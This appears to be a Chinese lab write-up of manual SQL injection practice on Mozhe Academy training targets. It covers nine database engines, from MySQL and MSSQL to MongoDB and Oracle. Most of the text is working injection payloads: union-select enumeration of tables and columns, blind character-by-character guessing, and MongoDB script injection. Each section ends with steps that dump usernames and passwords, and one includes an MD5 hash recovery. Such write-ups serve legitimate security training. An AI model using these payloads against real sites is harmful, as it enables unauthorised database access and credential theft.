各种数据库手工注入练习

用的是墨者学院的靶场:传送门

涉及以下数据库:

1
MySQL、Access、SqlServer(MSSQL)、SQLite、MongoDB、Db2(IBM)、PostgreSQL、Sybase、Oracle

MySQL:

1.找到注入点 and 1=1 and 1=2 测试报错

2.order by 5 # 到5的时候报错,获取字段总数为4

3.id=0(不是1就行,强行报错) union select 1,2,3,4 # 联合查询,2和3可以显示信息

4.获取数据库信息

user() ==>root

database() ==>mozhe_Discuz_StormGroup

version() ==>5.7.22-0ubuntu0.16.04.1

5.获取数据库表

1
union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database() limit 0,1

table_name 表名

information_schema.tables 系统生成信息表

table_schema=数据库名16进制或者用单引号括起来

改变limit 0,1中前一个参数,得到两个表
StormGroup_member
notice

6.获取列名

1
union select 1,2,group_concat(column_name),4 from  information_schema.columns where table_schema='mozhe_Discuz_StormGroup'  and table_name='StormGroup_member' limit 0,1#

结果如下
id,name,password,status

7.脱裤

1
union select 1,2,group_concat(name,password),4 from StormGroup_member #

Access:

1.and 1=2 报错找到注入点

2.order by 获取总字段

3.猜解表名 and exists (select * from admin) 页面返回正常,说明存在admin表

4.猜解列名 and exists(select id from admin) 页面显示正常,admin表中存在id列 username,passwd 同样存在

5.脱裤 union select 1,username,passwd,4 from admin

MSSQL:

1.and 1=2报错

2.order by N# 获取总字段

3.猜表名 and exists(select * from manage) 表名manage存在

4.猜解列名 and exists(select id from manage) 列名id存在,同样username,password也存在

5.脱裤 and exists (select id from manage where id=1 ) 证明id=1存在

and exists (select id from manage where%20 len(username)=8 and id=1 ) 猜解username字段长度为8

and exists (select id from manage where%20 len(password)=16 and id=1 ) 猜解password字段长度为16

可用Burp的Intruder功能辅助猜解

1
and exists (select id from manage where unicode(substring(username,1,1))=32 and id=1)

猜解username第1到8位的字符,ASCII转码 admin_mz

1
and exists (select id from manage where 32=unicode(substring(password,1~16,1)) and id=1)

猜解password第1到16位的字符,ASCII转码(Burp 爆破)

转ASCII的py脚本:

1
2
3
4
asc=[55,50,101,49,98,102,99,51,102,48,49,98,55,53,56,51]  
for x in asc:
rs=chr(x)
print(rs)

72e1bfc3f01b7583 MD5解密为97285101

SQLite:

1.找注入点 and 1=1

2.order by N 猜字段 4

3.猜数据库

1
?id=-1 union select 1,2,name,4 from sqlite_master where type='table' limit 1 offset 0#

offset ==>0~2

有三个数据库:

WSTMart_reg

notice_sybase

sqlite_sequence

4.猜列

1
union select 1,2,sql,4 from sqlite_master where type='table' and name='WSTMart_reg'#

共有3个字段:

id,name,password

5.脱裤

1
union select 1,name,password,4 from WSTMart_reg limit 1 offset 1#

MongoDB:

1.id=1′ 单引号注入报错

2.闭合语句,查看所有集合

1
2
3
id=1'}); return ({title:tojson(db.getCollectionNames()),2:'1

# db.getCollectionNames()返回的是数组,需要用tojson转换为字符串。并且mongodb函数区分大小写

3.查看指定集合的数据

1
id=1'}); return ({title:tojson(db.Authority_confidential.find()[0]),2:'1

[0] 代表第一条数据,可递增

DB2:

1.and 1=2 判断注入点

2.order by N 获取字段数

3.爆当前数据库

1
and (select count(versionnumber) from sysibm.sysversions)<>0  #判断是否DB2数据库
1
union select null,tabname,null,null from syscat.tables where tabschema=current schema limit 1,1

GAME_CHARACTER

4.列表

1
union select null,column_name,null,null from sysibm.columns  where table_schema=current schema and table_name='GAME_CHARACTER' limit  2,1

NAME

5.脱裤

1
union select null,name,password,null from GAME_CHARACTER%20 limit 2,1

PostgreSQL:

1.and 1=2 判断注入点

2.order by N 获取字段

3.爆数据库

1
union select null,null,current_database(),null

4.列表

1
union select null,null,relname,null from pg_stat_user_tables limit 1 offset 1 (修改offset后边的参数列表)

5.列字段

1
union select null,null,column_name,null from information_schema.columns where table_name='表名' limit 1 offset 1

6.拖库

1
union select null,name,password,null from reg_users (表名)

Sybase数据库:

1.and 1=2 判断注入点

2.order by N 获取总字段

3.爆数据库

1
and 1=2 union all select null,db_name(),null,null

4.列表

1
and 1=2 union all select null,convert(NVARCHAR(4000),name),null,null from mozhe_Deepthroat.dbo.sysobjects

5.列字段

1
and 1=2 union all select%20  null,convert(NVARCHAR(4000),name),null,null%20 from  mozhe_Deepthroat..syscolumns where id=object_id('Deepthroat_login') and  colid=1  //coid=1~N

6.查状态

1
and 1=2 union all select null,name,null,null from Deepthroat_login

结果为:zhang

7.反选爆用户名

1
and 1=2 union all select null,name,null,null from Deepthroat_login where name <>'zhang'

结果为:mozhe

8.猜解密码

1
and 1=2 union all select null,password,null,null from Deepthroat_login where name <>'zhang'

Oracle:

1.and 1=1

2.order by

3.爆数据库

1
union select (select owner from all_tables where rownum=1 and owner<>'SYS' and owner<>'OUTLN'),'2' from dual

4.列表

1
2
union select (select table_name from user_tables where rownum=1),'1' from dual
union select (select table_name from user_tables where rownum=1 and table_name not like '%$%' and table_name like '%u%'),'1' from dual //与用户有关的表,有个sns_name

5.列字段

1
2
3
union select (select column_name from user_tab_columns where rownum=1 and table_name='sns_users'),'1' from dual
union select (select column_name from user_tab_columns where rownum=1 and table_name='sns_users' and column_name<>'USER_NAME'),'1' from dual
union select (select column_name from user_tab_columns where rownum=1 and table_name='sns_users' and column_name<>'USER_NAME' and column_name<>'USER_PWD'),'1' from dual

6.拖库

1
union select '1','用户名:'||USER_NAME||'密码:'||USER_PWD||'状态:'||STATUS from "sns_users"

加上状态:1 where STATUS=1

1
union select '1','用户名:'||USER_NAME||'密码:'||USER_PWD||'状态:'||STATUS from "sns_users" where STATUS=1